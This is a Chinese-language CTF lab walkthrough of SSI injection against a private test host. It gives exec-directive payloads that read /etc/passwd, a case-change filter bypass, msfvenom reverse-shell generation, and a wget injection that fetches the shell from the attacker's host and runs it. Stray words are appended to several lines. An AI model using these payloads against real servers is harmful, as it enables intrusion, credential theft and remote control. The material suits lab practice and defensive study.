CTF—攻防練習之HTTP—SQL注入(SSI注入)

主機:192.168.32.152html

靶機:192.168.32.161python

ssI是賦予html靜態頁面的動態效果,經過ssi執行命令,返回對應的結果,若在網站目錄中發現了.stm .shtm .shtml等,且對應SSL輸入沒有過濾
該網站可能存在SSI注入漏洞web

ssi注入就是尋找輸入點輸入相似<!--#exec cmd="命令" --> 格式,看看能不能運行系統命令。shell

如 <!--#exec cmd="ls" --> <!--#exec cmd="cat /etc/passwd" --> apache

切換目錄<!--#exec cmd="cd /root/dir/" -->服務器

 

 nmap,nikto 分析,發現可能存在SSI注入,tcp

dirb 看看目錄測試

index目錄下,有個SSi語句優化

 SSI目錄下看到應該是和命令注入有關網站

經過robots.txt目錄挖掘到站點的根目錄

打開網頁找一個注入點,測試後,在這裏找到,發現有過濾,大小寫可繞過,網頁給出的測試命名少了個!符號,加上測試成功

 

 此時咱們就能夠嘗試生成一個python shell 上傳到網站服務器根目錄上,再執行反彈監聽

 msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444
在打開msfconsole監聽

此時再將生成的pyshell上傳至web根目錄(/var/www/html),再打開apache服務器

 

在開啓apache服務器,查看狀態

再將pyshell下載到站點上<!--#exec cmd="wget http://192.168.32.152/pyshell.py"-->

再提權

<!--#exec cmd="chmod 777 pyshell.py" -->

 而後啓動python pyshell.py,成功反彈shell!

 

隨後,進入shell,優化終端,能夠進入root目錄

相關文章
相關標籤/搜索